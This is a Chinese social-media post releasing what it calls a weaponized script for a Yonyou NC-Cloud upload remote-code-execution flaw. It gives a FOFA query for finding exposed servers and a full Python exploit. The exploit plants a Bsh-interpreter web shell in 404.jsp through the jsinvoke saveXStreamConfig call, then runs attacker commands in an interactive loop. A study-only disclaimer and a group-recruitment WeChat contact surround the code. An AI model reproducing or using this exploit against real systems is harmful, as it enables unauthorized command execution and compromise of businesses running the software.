gh开始到一个小高潮了,每天0day爆出无数,既然发现这个也被爆了那就直接把武器化脚本丢给大家,祝各位打出自己满意的成绩!!为国家网络安全提升做出贡献!!!
免责声明:本工具只为学习使用,切勿用户非法途径。一切因本工具或此漏洞产生的后果,利用者自己承担,与本公众号任何人无关!!!!
用友nc-Cloud upload rce
fofa=app="用友-NC-Cloud"
` ``import requests``import re`` ``def cmd(url, command):` `url = url + "/404.jsp?error=bsh.Interpreter"` `headers = {"Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"}` `data = {"cmd": "org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(\"" + command + "\").getInputStream())"}` `r = requests.post(url, headers=headers, data=data)` `print(re.findall(r'<string>(.*?)</string>', r.text, re.S)[0])`` ``def upload(url):` `url = url + "/uapjs/jsinvoke/?action=invoke"` `headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip"}` `json={"methodName": "saveXStreamConfig", "parameters": ["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}", "webapps/nc_web/404.jsp"], "parameterTypes": ["java.lang.Object", "java.lang.String"], "serviceName": "nc.itf.iufo.IBaseSPService"}` `r = requests.post(url, headers=headers, json=json)` `if r.status_code == 200:` `print("上传成功")` `else:` `print("上传失败")`` ``def main():` `url = input("请输入url:")` `upload(url)` `while True:` `command = input("请输入命令(quit退出) > ")` `if command == "quit":` `break` `cmd(url, command)`` ``if __name__ == '__main__':` `main()`
请勿用于非法用途!!!!后果自负
41全体祝大家工作顺利!!!!!
欢迎各位大佬入群交流,需要各种资料也可入群领取。
二维码失效加好友进群!!!!!!!!!!!
群满请加wx入群!!!!!!!
wx:Mathearsion